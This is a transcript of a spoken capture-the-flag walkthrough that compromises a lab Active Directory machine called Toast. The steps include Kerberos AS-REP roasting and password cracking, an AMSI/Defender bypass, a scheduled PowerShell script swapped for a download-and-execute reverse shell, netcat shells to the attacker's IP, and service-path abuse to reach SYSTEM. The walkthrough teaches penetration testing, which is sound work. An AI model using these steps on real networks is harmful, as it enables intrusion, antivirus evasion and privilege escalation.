Welcome back. Today we will also tackle down another Active Directory machine, which is difficult and hard. The name of the machine is Toast. Yesterday we solved Sync. We're gonna complete all of the challenges in a brief amount of time. I guess the next week we'll be finished with all of these, and then we're gonna move to the Hack the Box. Okay, so today we are with Toast. So basically, in Toast, what we did here, we scanned the machine and we found out a couple of open ports. Let's make this bigger. Okay, so here we have 5388 and we have the LDAP port, which means we are dealing with Active Directory system. I have RDP and a couple of open ports down there. Okay, so that was it. So what we're gonna do now, first, we have the SMB shares, as you can see, 130,445. And we have the Kerberos, which means we can do some brute force for the current users. And we can deduce their passwords if they don't have, or if one of them doesn't have the pre-authentication setting or switch whatsoever enabled. And we can also enumerate the LDAP directory here, right? To find out more info about what's in, what are the users, the groups, if there are any plain text passwords we can find. Okay. So since we have Kerberos here, we can try brute force, but first we need some info. That's why we're going to start with the SMB file shares. So we're going to go down here. We're going to split. Okay, it's going to split from here. You split. Okay. And now we're going to do some SMB enumeration. So basically, you're going to start sudo SMB client-l. And we're going to grab backslashes here. So just a second. Okay. So paste. And then we have the IP of the machine, which is 172.168.3.8. And then we're gonna paste the backslashes 3. Okay, 3 is okay. Yeah, so let's try this. So we might need 4. 1 here. And 1 in here. Okay. So this is an unauthenticated enumeration for the shares. As you can see, we haven't supplied any username. So we have connection failed. The reason for that is the VPN connection here has connected. Let's try now. So we are here presented with a password to supply, which we don't have. So we're going to proceed with blank. And obviously, we can list the shares on the system. So we have Potato, we have Karen. These are the shares that stand out. Okay, so basically, let's try to enumerate more. So here, we're going to remove 2 of these. And we're going to type Karen, see if we have right access on this directory or on this share. No password. So we have been granted access. Let's list access denied. So we can't read the content of Karen. So we are in Karen, but we can't read the content of it. That's pretty much good, right? Okay, so let's exit then. And let's go back and try with Potato. So ls, again, access denied. So let's quit. Seems like in order to read the content of the shares, we need an authenticated access, which means we need some users, some passwords, some users from here, passwords from there. Okay, so All right, that doesn't mean that the configuration of the SMB share is good. It's not good because we are allowed to view the shares with an unauthenticated access. We should supply username and password even if we want only to list the shares. Okay, so as you can see, we have Karen and we have Potato, which seems to be like username list, right? So let's clear that and sudo nano users.txt. So Karen small, potato, potato small, and we're gonna save that. Great. So if you remember, if we go up, we have Kerberos on the Active Directory, which means we can do some brute force to find out who are the valid usernames. What are the valid usernames? So for that, we're gonna use Kerberos Linux N64. So ls dash Kerberos, and here we need to supply some basic info about the domain and the DNS name whatsoever. So here the DNS name is, let's go to nmap scan and find out. So DNS name is toast.csl. Okay, so toast.csl. And then we're going to define the domain controller IP address, which is 172.31. Let's go down. .3.8. And we define the username list, which is users.txt. Unknown command. Yeah, so we have here double dash. So what do we have here? Missing dash D dash DC. Unknown comment. Here that. So in here, okay. So I don't know what's changed. So for the word list, what user password spray, user enum. Oh, so we forgot the user enum actually here. So that was it. So we go back here and we put user enum, and that did it actually. So we have potato, Karen. So all of these are actual valid usernames, right? So now the next step, if you remember in the last video, we're going to do exactly the same. We have a list of valid usernames. So we're going to try to find out which one of them has the pre-authentication setting disabled. These users aren't required to provide the pre-authentication ticket. So which means we can dump their ticket, a granting ticket, by sending a simple request or a dummy request to the Kerberos server. How to do that? We're going to list here. We're going to go to inpacket. We're going to move first sudo mv-users.txt, and we're going to move that to inpacket examples. Yeah, because we're going to use that word list. All right. So next we're going to run get np users. So cd np packets, cd examples. Okay. So now sudo Python 3 get np users .py, and then we define here the domain controller IP, which is 172.31.3.8, and then we're going to define yeah, so toast.csl, the domain controller name slash user file we have, which is what was the username list? Okay, users.txt, and we run. So as you can see, the output, from the output, we can see that the user Kieran has the peer authentication disabled, and here is the ticket granting ticket. So we can grab this and crack it with John the Ripper. So copy that, and then we're going to go back desktop. So here we're going to sudo nano pgt. I'm going to place this. All right, then we're going to use John the Ripper, sudo John -- word list will be user share word lists. Okay, rocku.txt, and here we're going to use a tgt. Okay, so the password has been found, which is manager. Now, what would have prevented this from happening? And the first thing, the users on the Active Directory, all of them should have the pre-authentication required. So if the pre-authentication was enabled on every user on the Active Directory, including Kieran, we wouldn't have been able to dump the ticket granting tickets. And assume that the pre-authentication was disabled, like in this case. If the password was strong enough, we wouldn't have been able to crack it. So you see, it's very silly password manager. Okay. So sudo mv inpacket examples, and here users.txt to, and I'm going to put that users -passwords.txt. Okay, sudo nano users. So here we have, let me go back, check again, Kieran with small letters. Okay, so I remove Kieran from here. Kieran at toast.csl, and here we're going to remove that, toast.csl. So the password here is manager, right? So next thing, we found the password of potato. So for potato, to find the password of potato, we have two options. Let's go back to the nmap scan, see what we can do to find the other password. So we have, let's check again, 43. We have the RPC. So the RPC protocol is a protocol to display information about the Active Directory or the Windows system. So we can interact with the RPC, or we can interact with the LDAP. Why? Because we have now one password, which is manager. So we can assume the user of Kieran and authenticate with LDAP or RPC in the hope that we would find something about the user, which was potato. So how can we do that? So basically here I'm gonna do it in two ways. So first clear. So first sudo RPC client, and then we're gonna put toast, or put the IP first. Let me try with the IP. 8-u Kieran. So Kieran password is manager, uppercase. So now I'm authenticating myself. I'm assuming the Kieran identity to the RPC server to find more info about the Active Directory, the users, the groups, and if we are lucky, we will find some plain text passwords. Well, that's taking some time. I don't know why. Okay, so query this info. Oh, finally. So basically, let's see what we have. So if we have administrator user on the system, we have guest, we have Kieran, which we are, poacher, we have poacher, and we have potato. And we have the password of potato. So we have plain text password found here. So we can copy that. We can then, let me open my lovely mouse pad. All right, so here we're gonna put password, and we have poacher. So poacher is something to look for, actually. All right, so what is that? Okay, so now we have Karen, potato, poacher. These are enough to start interacting effectively and efficiently with the SMB share, right? We can then interact with the shares, have read-write access, and upload our payloads. But let's be some, let's here be some kind of, let me close that. Okay, let's now spill our greeds and find about poacher. So we are interacting with RPC and interacting with Kerberos. Let's see if we can also interact with the LDAP here. So how can we interact with an LDAP protocol? We can do that with Python. So basically here, I'm gonna close this, get my terminal back up. Okay, so I'm gonna quit this, clear. So now we can type Python 3 and start interacting with the LDAP. I'm gonna import first LDAP 3. And the next thing we do actually is to write the interaction commands, how we will connect to the LDAP. So we can go to here, I'm going to show my reference. So we go to hack tricks and look for LDAP enumeration. Yeah, as you can see, we can use Python to connect to LDAP. So basically, we're going to use these, right, to find out the info about the LDAP server. Maybe then, only then, we can find some plain text credentials about poacher. Okay, so we have this one. Let's go up. So we can grab this here. Copy that. And then we're gonna use our text editor here temporarily, just to edit the info. So here we have, which is 172.31.3.8. I'm gonna close that here. Okay, so we define first the server, which is the address of the machine. We paste that here. And we get some error, no idea why. AOL. So, okay, let's write these from scratch. It's better to avoid this kind of error. So let's go back. So here we're going to type server equal ldap3.server, open quotes, single quotes, 172.31.3.8, close the quotes, get info. Okay, let me close that one. I know it's doing some kind of shadow. Okay, that is better. Equal ldap3.o. The module LDAP3 has no attribute server. Yep, we forgot this. Okay, so now we define the server. Let's define the connection now, which includes the username and the authentication actually. So we're going to authenticate with Karen and then we're going to try to authenticate with potato. Connection equal LDAP3 dot here with uppercase connection, and then we're going to type the variable name, which is server we defined earlier, user equal turn, and then we define her password equal manager, right? Okay. Then we're going to bind and establish the connection. Connection dot bind. Let's find out. If it returns true, it means that our connection has been successful. All right, so the connection has returned true, which means we are successfully authenticated. Now we can start interacting with the LDAP server. So the first command we type is to the purpose of this command is to display the info about the server. So we type server.info. Let's go up, and here are all of the info about the Active Directory scheme. You can find everything, the groups, the domain name, the members, everything. But we're looking for something specific here. So here we have the DNS info, the schema, DNS domain names, supported controls, LDAP service name, the forest, and yeah, so I'm looking here because I found credentials the first time. I'm looking for these credentials here, but I seem not to find anything here. Let's go back now to, okay, so here we have server info. Now if you go down, once you have the naming context, you can make some more exciting queries. The simple queries should show you all the objects in the directory. Connection search, server page, DC, full domain, search folder. You can use that to display the objects in the Active Directory, which means we can display the users, the groups, all of this kind of stuff. So let's take that and modify it a bit here. So in here, you're going to replace that with toast, and here with CSL. Take this and paste it. I hope Python now won't throw an error like end of statement, end of line, sorry. Down, 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 down. Okay, paste. All right, so it took some time to run this query on Python. For some reason, I didn't know why. So I proceeded and interrupted the interpreter here. So actually, if you do that, we're going to get the same password we have got when we interact with the RPC bind. So pretty much now we have only Karen and Potato. And as mentioned by Hectrix, we can automate all of these commands using Nmap. So let's give this a try. So Control D here, clear. Now, as you can see here, we have Nmap and the IP. So let's first find out more about the Nmap scripts that tackle down or deal with LDAP. So basically here, okay, let's try this. So sudo nmap -n -sv -script, and here we type this. And the IP. So let's close this down, go back to our terminal. And let's see if we can find the same info we have found while interacting with LDAP via Python with Nmap here. All right, so while this is running, let's now start using the credentials we have just harvested, Karen and Potato. So we can use these credentials to interact with the SMB shares. So we're gonna close that. I'm gonna split the view. Keep the Nmap running. Okay, so here sudo smb client, and of course we need the backslashes. So here we go, take the backslash. 1, 2, 3, 4, and here we type the IP 172.31, 3.8. I'm going to type 2 here. I'm going to type potato, which was the name of the share, if you remember. Potato -u potato. Connection failed. So here we remove the single quotes. Again, we get connection failed. Okay, MB potato at 172.31.3.8. Okay, now the password is this one. Copy that, paste. Let's examine Nmap scan. The Nmap scan hasn't returned anything meaningful. Only have the domain, the site. Okay. So here it's not responding. Yeah, it's the VPN again. It is the VPN. Okay, let's go back. Control C. Try with this one. Now the password is this one. Paste. So we are authenticated as potato. So PWD, we are in potato list. So we have one PowerShell script, as you can see. It is PowerShell script, and I have access to this PowerShell script, read-write access. So type clear Okay, so let's get this PowerShell script to our local machine. Get clear logs.ps1. So here we have it, as you can see. Let's see what it does. So nano clear. So as you can see, it claims that it cleared the logs every minute. rm-force from this location, error action silently continue. So it's kind of removes and takes out the logs every minute. So this is a scheduled task, and which is something that jumps right to my mind that if we modify this script to run our own payload, we will get reverse shell. But that was not pretty simple. Why? Because this machine has some kind of anti-malware scanner. So here, let me go and tell you what I mean. So Google, so here if we type AMSI, anti-malware scan interface, which is something with Microsoft. Let's read more about this. Now, this functionality is enabled on the machine we are testing, and we should all the time assume that the end machine or the remote host has some kind of antivirus protection. We don't want to get knocked out of our testing because we are lazy and careless about the existence of security software. That's why we need to assume that there is some kind of protection. So anti-malware scan interface, Windows anti-malware scan interface is a versatile interface standard that allows your applications and services to integrate with any anti-malware product that is present on your machine. So it's pretty much service with Microsoft. So this one is enabled on the machine as well as Windows Defender. So in order to get around this, we need some kind of obfuscation. So we're going to now demonstrate how can we bypass the anti-malware and Windows Defender presented on the remote host. So in this script here, we're going to type some PowerShell commands to download an obfuscated payload, and we disable the antivirus. Only then we can proceed to gain access. Okay, so now we're going to try modifying this PowerShell script and put our own one-liner and see what's going to happen, right? So we're going to Control X here, and let's bring one-liner PowerShell. So here we go to Google, one-liner PowerShell, reverse shell. So we go to GitHub, which is the basic PowerShell one-liner here. Just pops up whenever you look for it. So this is it. We're going to grab this, all of that, copy it, and go back to our desktop. So here we minimize this. It requires sudo. Okay. So here I'm going to put that line here, or we're going to remove it actually. We don't need it anymore. Then we're going to put our own one-liner. So paste. So in here we need to modify a couple of stuff, including the listener, ports, and the IP address. So okay, so here we modify the port will be 4545, my preferred, and here is IP. It's going to be an IP address. That's 7. Okay. So now I'm gonna save that. All right. So we go back now. Let's log in again to the share here with potato the password. Okay, ls. So we're gonna delete this one, right, and replace it with our own. Okay, del put now clear. So right now our own reverse shell has been transferred. Now in our desktop here, down there, let's launch a listener nc-lvp 4545, and let's launch this PowerShell. I'm gonna write power command found. Oh, it's not responding for some reason. Uh, but the PowerShell script, or we didn't have to receive any reverse shell. So back to our command and control center. So there is something preventing the script from running, which is probably an antivirus or Windows Defender or anti-malware scanner interface. So what we ought to do here, we need to disable any kind of protection. So to do that, we're going to need to use some module in PowerShell to achieve this purpose. So for that reason, I'm going to switch now to my Windows machine. In the Windows machine, we're going to install a module to obfuscate and disable the PowerShell, disable the anti-malware protection. So, ISE, launch the PowerShell editor. All right. So here we're going to type a command to install a module called ISE steroids. This module will obfuscate any code we want we want in PowerShell. So if we type any module here, this ISE steroids will obfuscate the command or whatever we type in the PowerShell editor. That's what we're going to do now, or what you are doing now actually. All right, so for me, I downloaded the module manually. You can download it manually from here. Just you can click on, go down. It's not rocket science, just download from here, and from this button, follow the instructions. Okay, so here I'm going to start the PowerShell editor, the PowerShell, the module actually. So here, start steroids. Here we get some welcome screen. Click on accept. So we have some product is unlicensed, so we're going to need to put a license, but no problem. We can use that for one time, since we're going to use that for one time only. Okay, so what is our next step now? Let's go back Our next step here is to, here now we prepared the module that will obfuscate our PowerShell commands. The next step is we find a way to disable the antivirus or the protection. How can we do that? There is a page on GitHub that deals with the anti-malware interface in Windows. So it would bypass the protection. So basically here, the page, you can find it on GitHub, AMSI bypass PowerShell, bypassing anti-malware scanner interface. So if you go down here, there is one a line that puts out this. So I think this one. Yep. So basically we're gonna grab this, copy that, go back to our PowerShell editor, which is here. We're gonna paste that, we're gonna tools, and then obfuscate code. Click on OK. So this is our code, right? This is the PowerShell code or the obfuscated version of a PowerShell code that will disable the anti-malware scanner. That is your first code. So we're going to grab this, copy that, go back. I'm going to disable the listener, clear that. Okay, so I'm going to work on the upper one. So sudo nano. Here I'm going to type, the first one will be bypassing MSI. So AMSI by. Or let's be realistic here. It's not good to, in a real scenario, it's not good to rename a script to be descriptive of your work, since your work is malicious. So rename it something like clear logs v1.ps1. So we're going to paste the code. Let's look at that. Okay, so now we have our first payload. And the next payload will be the one-liner. So the one-liner, let's go back. The one-liner is here. So go back. The one-liner is in clear logs. So basically what we're going to do now, this is our script, right? Clear logs, the original script. We're going to modify this to include the bypass script and the PowerShell one-liner. Oops, I got some problem in my Defender. I'm going to exclude the ISE editor. So here it's saying something like PowerSC. Okay, allow on device. Okay, all right. Fair enough. Now the next step here, let's combine the two scripts in one file. So here we're going to work on this one. So sudo nano clear. All right, that's my script. So here is the PowerShell one, right? Now, instead of doing that, I'm going to remove the PowerShell script, all of it, right? And the clear logs will include two commands to download and invoke the bypass script and the PowerShell one-liner. So we get two scripts working at the same time. So the final script here, the two commands will be IEX invoke expression, IWR, and here we can use basic parsing, use basic parsing, and then I'm going to type the IP of our own machine. Of course, this is the Python listener, and here the path to our scripts. Let's go back. So we have two. We have the bypass one, which renamed clearlogs version 1.ps1, and we have the PowerShell one-liner, which I haven't constructed yet. I'm going to do that now. So here I'm going to put the clear logs. First, we download the antivirus bypass. So once PowerShell executes that, it will download the clear logs from my machine, executes that, and bypass or disable the anti-malware. I don't think it's going to disable that. It's just going to allow us to run the subsequent command, which will be IEX IWR. It's going to be the same, -u use basic parsing 8,000, and now we put, okay. So let's go back, take the PowerShell one-liner, and then here sudo nano something like, so clear logs version 1.ps1, which is the PowerShell bypass, the antivirus bypass, anti-malware bypass, name it whatever you want. Clear logs version 2 will be the PowerShell one-liner. Paste this like that. So here we put the IP 0.7 4545. Okay. Clear logs v2.ps1. So what's going to happen now? It will launch this, right? Disable the anti-malware for a second, then launch this to, establish the PowerShell reverse connection back to our machine. So save that. Now we're going to need to connect again to the desperate share. So potato, and here we're going to paste ls. So del, the old one, and now put the new one. Let's put a listener here, which is going to be nc-lvp 4545, and here we put the new one, logs.ps1. Now we're going to wait for this to be run because this is a scheduled task. It's going to run after 1 minute, and we are supposed to receive the reverse shell. Now, when we receive the PowerShell connection back to our command and control here, it's going to die after some very short time. So that's why we're going to precede that with a netcut connection. So let's netcut to our local machine and put that in the share. So nc.exe 64-bit. So we're going to download this, click download. So I have this one. So now I'm going to, let's make sure that's the file. So where it is, in downloads, copy that to desktop. Which is here. I think we forgot something to run our Python server. So otherwise the script will not work. So here we forgot to do that. So Python 3-m http.server. Okay. Now here put so ls put nc64.exe, right? So right now we have the clear logs and we have nc64. Once we receive the connection back from running this script, we're gonna use the new session from the PowerShell to launch NC64 in order to establish a clear, fresh session without any interruption. So after waiting for some time, approximately 1 minute, as you can see, the files have been downloaded, and we got the reverse shell. But it quickly ended, as you can see, so I'm going to spawn it again. And from here, as you can see, we received the connection ID. Sorry, it's going to be home/user. So it is working, but it's going to die as it did a while ago. So I'm going to put here a netcut. So here, put and see. So we have no netcut on the system or on the machine. What we're going to do now, we're going to download the netcut, or we're going to execute the netcut actually. So basically, from here, I'm going to get enter. No, here, enter. All right. From my already spawned shell, I'm going to execute netcut. So let's first put the listener or new tab. It's better actually, new tab, dark. So in here, we're going to, nc-lvp 4546. So cd shares potato. Okay, now let's launch the netcut nc64-exe-ecmd.exe 10.0.7 4546. Um, 4646. Oh, so it's going to be 4646. So paste 4646. All right, so we received the connection now here on this interface. So now we have a stable connection, and now we have established the first connection back to our command and control. So what happened here is, as you can see, let's go back. So, all right, let's do this one. So here I downloaded first the clear logs version 1, which bypasses the anti-malware system or the interface. After bypassing the anti-malware, it's very critical you put the second reverse shell one-liner right after the bypass script. If you put this before this, it's not going to work. The anti-malware will prevent your script from running, as it did, as we see a while ago. So that's how we bypassed the anti-malware interface, and now we have got a reverse shell. So now the next step is, as you all know, is the privilege escalation. So what about the privilege escalation of this machine? We have an anti-malware scanner, right? And it is Active Directory. So what we will do here, as you know, we have one piece. We can drag it here and run it, but it's going to take some time. I'm going to jump right to the privilege escalation vector. But how are we going to find this? We're going to find this from winpiece.exe. But I don't want to waste time on this. We're going to jump right to that. So here. So let's go back. See what do we have? Directory. So if we go to program files, cd program files. cd, let's put double quotes. So in here, we have, you will find in ownpiece.exe that it's telling you that we have a directory called purgatory. So if you see to purgatory, there is no tab auto-completion, that's fine. So we have here another directory called up for the challenge. Let's go to that directory, up for the challenge, up for the challenge. Oh, so I can type cd the second time. Okay. Up for the challenge. Jesus Christ. I'm gonna cry. Okay, so here we have an executable. Welcome to hell. Okay, so this executable is linked to a service. The service, let's go back to our file here. The service, as you can see, the name of the service is Escape. So basically, this service has an uncoded path, which means that when we start this service, when we type sc start, right? Start Hellscape, right? So what's gonna happen here? It's gonna, let's copy that. Copy it, go back. Okay, so this service, once we start it, the service looks for the application, right? The application in this case is welcome to hell, but that's not, but the order of the execution is not what you think. The order is Hellscape will look for program.exe. If it found program.exe, it would run program.exe. If it didn't find that, it will go to purgatory, right? It will go to up, sorry. So here up.exe is the next. Why? Because it's uncoded. Like the service path is uncoded. It should be coded like that to prevent that from happening. If we did that, the service path, if it was like that, the attack wouldn't have been possible. So if you remove the codes, we will create a possibility for many kinds of payloads executions. So we can create a payload named program.exe and put it in program files, or we can create a payload called up.exe and place it in up for the challenge. It will run up.exe instead of what? Instead of welcome to hell. Why? Because the service path is uncoded and up comes before welcome to hell, which is the original executable. So our next step here is to create a payload, but not with MSF Venom. Why? Because we have anti-malware interface. It would block the execution of just such payloads. So we're going to create a Powershell script here and convert it into an executable. Only this way it's going to work. So we're going to create here a PowerShell file called up.ps1 and convert it into an executable file. Why? Since we can't launch MSF Venom payloads and we need some mechanism to bypass, we can't dedicate time for that now. We're going to use the same script here, clear logs, as you can see. We're going to convert it into up.exe and place it here, but we're going to create a new one. It's better. So let's copy that. This one. And here, first we're going to modify the ports on the reverse shell. So this one is going to be a different port, which will be 4547. Since we were going to establish a new and separate connection. Save. Great. Okay. So here, this is the script we have. So this one I'm going to save as. I'm going to name it, put in desktop, name that up.ps1. Save it. So the next step now is we create a payload called up.exe. But this payload will not be created with MSF Venom since we not be able to bypass the anti-malware scanner right from MSF Venom. So in order to bypass the anti-malware scanner, we're going to need to follow the same way we did when we first had the reverse shell. So I created now the same script. The content is the same of this one, but I changed the name. It is up.ps1, And now we need to convert this into an exe file. This exe file will be launched by the service. Once the service is launched, it will bypass. Let me open that. Some people cannot understand like that. Okay, so once we launch the service file, it will, as you can see, download the bypass script and then launch reverse shell. But in this case, it will be in the context of the service user. Okay, this one. So we have the script. Now let's convert this into an executable file, which can be done with this tool. This tool is from Microsoft TechNet. You can find it on the internet. Just type PowerShell to exe, not rocket science. Now we launch this tool. There is a GUI interface here. The source file is the PS1 in downloads, and we click on compile. So it has been finished. So now let me grab the resultant file, which is in okay. So let me copy that. Okay, this is the file, right? And don't forget that the new script, if we open it again, we will need to, in this PowerShell one-liner, which is here, just change the listener port. Don't forget that, because we have an already established listener. So I click on X. Now, the next step is we transfer this up to the directory here. So we can use certutel for that. Let me try it. Okay, so it's live, the bar. Okay, right. So go back. certutel-url cache-f http plan 0.7 8000 slash. Oh, so let's rename that to something. So here it's going to be up. Here it will be up.exe. Let's see if this works. Access denied, so we can't use certutel. So we need to find another way to do that. So we can do that through the file share. If we go to, if you go back here, right? So we have an already established session. Let's go and reconnect to the SMB file share. Grab the password manager. No, this is this one. Copy that and paste. So here put. So it seems like access denied. So we're going to try purgatory. Paste. Okay, great. So now we have moved the executable file from the share, right, with this command. Okay, now the next step, we need to launch the service. But before we launch the service, we're going to establish a netcut listener. So new tab, dark, nc-ltp for, it was 47, right, if I remember right? 4547, 4547, okay. 547, and go back. So here we start the service, sc start, or put executable file, it's better, start, hell, okay. That is great. So we receive now another reverse shell back to us. Let's see, who am I? dash user / user. So we are now the service user. So we have escalated our privileges from potato to service user, but that is not enough. we need also to escalate to net authority system. So far, what we have done so far is we bypassed the anti-malware scanner with an obfuscated PowerShell, created reverse shell back to us with potato, and from potato we found an encoded service path. We created an executable file, which was the conversion from a PowerShell script that does the same job the first one did. And we got another reverse shell with the service user. y/user. Now from here, cd c shares potato, and now we're going to execute another netcut session. Stable. Oh, okay, that's okay. nc-lvp 4548. Again, we died, no problem. We can launch that again. Okay, cd shares potato. All right, now nc64.exe cmd -e cmd.exe nc 10.10.07.4548. Nope. What's wrong now? No idea. Directory. Oh, we don't have. Okay, we have it. So again, nc64.exe -e. Oh God, I hate these kind of labs. Sucks up my time like that. Ten 10.07.48. Oh, finally. Okay. /user. Okay, great. So now we have a stable shell. All right. Now let's run the service enumeration PowerShell string or command. Paste that, and we're gonna need the pipe. Okay. All right. So as you can see, we have now the services that are not standard, and see if we can find something interesting. Okay, so we have these services. All right. Windows Defender, Connection Manager. Go up. Oh, that was it. So basically, we're gonna work on this. Now, why I choose this one? Because after a couple of tries, I found that this one, we can change the path of its executable, the executable file here. So instead of this one, which is built in Windows executable, we can use our own. So, as I said earlier, we also like to use the built-in Windows services all the time, unless we find a service that is not built in and has some security misconfiguration, like the one we found before. we always like to stick with Windows services. So what if we can manipulate here one of the services, right, that uses that app to use our own executable? If we can do that, we can elevate our privileges successfully and reliably. So we can sit down and try this one, this one, this one, this one, right? We modify the bin path, the path from which the service executes its own binary. So we can try all of these, right? The only one, to save you time, that worked is this one. So how do we know which one works and which one will not work? Basically, we need to check the privileges. We need to see if we can really modify on the service. So how can we know that? Let's go down here and use an executable to check on the permissions. So access check.exe accept, because it will give you like prompt to accept terms and conditions. We're gonna accept that by default. ELA, and here we're gonna specify the name of the service. No, the name is here, USOSVC. So we don't have this. We need to download this some way. So we can always go to our friend here and Google. No, keep the backslash, please. Google here, access check.exe. Download that. Right. Extract. So we need this one, the 64 one, extract it to desktop. That was it. Let's make sure the file has been. So here, take that away. Copy here. Okay. Close everything. Quit. All right. So now go back to my connection with the SMP server. We're gonna put access check. Okay, go back to our reliable shell directory. So we have the access check here. Now we can use that reliably. Access check 64.exe, and we define then accept and we put the name of the service. Okay, great. So here we check on the permissions and who owns the service. So as you can see here, the list of authenticated users. We have the administrators, and we have everyone in the group net authority system and everyone in the group net authority service. So which means we are in this group because we are the service user, which means we can modify on the service. We have the permission to do that thanks to our privilege escalation efforts. Okay, so now let's see if we run the service, who is the user running the service? Why? Because we want to know if we escalate our privileges using that service, which is the user we're going to assume. So sc.exe, qc, and then the name of the service. Going back to service start name, local system. That is what we are looking for. This is the service we are looking for, and we're going to use that. We're going to piggyback on this service to have a privilege escalation. Given that we have permissions to modify on it, we're going to modify the bin path of it. So now we can also use the clear logs script, and we can use the executable file, which is up.exe, right? So if we directory here, we can let the service, instead of running this app with this binary, we're gonna let the service run one of these, or one we can create now. We can use netcat, we can use clear logs, but I prefer the quick way since we have netcat ready. So we change the execution path. All right. So before doing that, let's do, okay, so let's split that. Okay, nc-lvp 4549. Great. Now let's change the bin path. So sc.exe and then config the name of the service, which is usosvc bin path. So bin path, here we define the path we want the service to use. So cmd/c, again the backslash. That's why I didn't terminate the tab here. Take this. Oh no. All right. Copy. Paste. So shares. One again. Potato. Another one. nc64.exe -ecmd.exe 10 10 0 7 4 5 4 9, and we hope that will work. So we changed the bin path. So now the service, instead of running that app or that binary, it will run our own CMD. So sc.exe start usosvc. Already running. Okay, so I think we want to stop this first. sc.exe. Okay. Okay, fine. So finally we got the net authority system. So /user. So we are net authority system. And finally, this machine is done. Let's go over what we did, wrap everything up to make sure you guys have the bottom line. So basically here, the first thing we did, I hope I can assemble my ideas here now. So basically we found Kerberos. We have some users here, user and passwords. So in here we have cracked Kieran, Potato, and use their passwords to authenticate to the file share. And how we did that? The same way we did with in the last video, we were able to find the user. In this case, it was I guess it was manager Kieran manager that has a pre-authentication key disabled. That's why we were able to grab their password and log into the SMB, and also interact with the LDAP with Python. Somewhere here, I couldn't find it. And we also found the password of Potato. Now for Poacher, I haven't found the password of this user. It was not of interest, but you can try some way. Since we have these passwords, now we have authentication access to the SMB share, which means we can download, upload, modify. That's what we did with the ClearLogs script. We changed the content of that script to upload our own PowerShell payload. But before that, we bypassed the anti-malware scanner with the script. This one? Nope. Yeah, keep that. So we created that one to bypass the anti-malware scanner with the PowerShell editor enabling the ISE steroid module, right? And we got that from this page. This one? Yeah. So this is the PowerShell command to bypass the anti-malware scanner, encoded with the steroid user, the steroid module, and have this. Store that in one PS1 file, and the second one, it has the PowerShell reverse shell, and then we downloaded both files using this command. We replaced the outputs, the final one with the original one, in order to have the reverse shell. So once we have the reverse shell, the first reverse shell was here, Potato. We found uncoded service path in the hell escape on this path, and we put our own executable file up the same way we did with the Powershell script to bypass the anti-malware scanner. And that was the second security misconfiguration, uncoded service path. The third security misconfiguration on this video was where was this? Yeah, was the ability of a service user to change. Actually, this one is inevitable. You can't. I don't know if you can find some kind of remediation for the thing we did here with the service user. I mean, a service user can access or modify on the service. So I would blame the uncoded service path. The main culprits that enabled us to have the net authority system, guys, for my opinion, it is these guys. So if the Kerberos was set up correctly with the pre-authentication tickets or pre-authentication, tickets, we wouldn't have been able to find the password of Karen, and then we wouldn't have been able to find the password of Potato. So that's why authentication is very important. I mean, if we haven't found the password of Karen and Potato, we wouldn't have been able to arrive at this point and found that we have an unencoded service path to eliminate our privileges. That comes second, right? Okay, so we hope that was helpful, and see you in the next video. Hopefully hack the box.